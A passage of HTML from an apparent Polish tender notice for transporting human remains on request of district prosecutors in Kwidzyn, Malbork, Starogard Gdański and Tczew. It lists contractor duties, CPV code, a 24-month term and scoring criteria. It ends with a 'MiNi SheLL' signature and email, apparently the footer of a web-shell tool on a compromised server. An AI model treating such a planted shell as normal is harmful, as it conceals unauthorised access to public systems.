<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratury Rejonowej w Kwidzynie także z terenu powiatu sztumskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przewóz zwłok ludzkich na wniosek Prokuratury Rejonowej w Malborku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratury Rejonowej w Starogardzie Gdańskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratury Rejonowej w Tczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com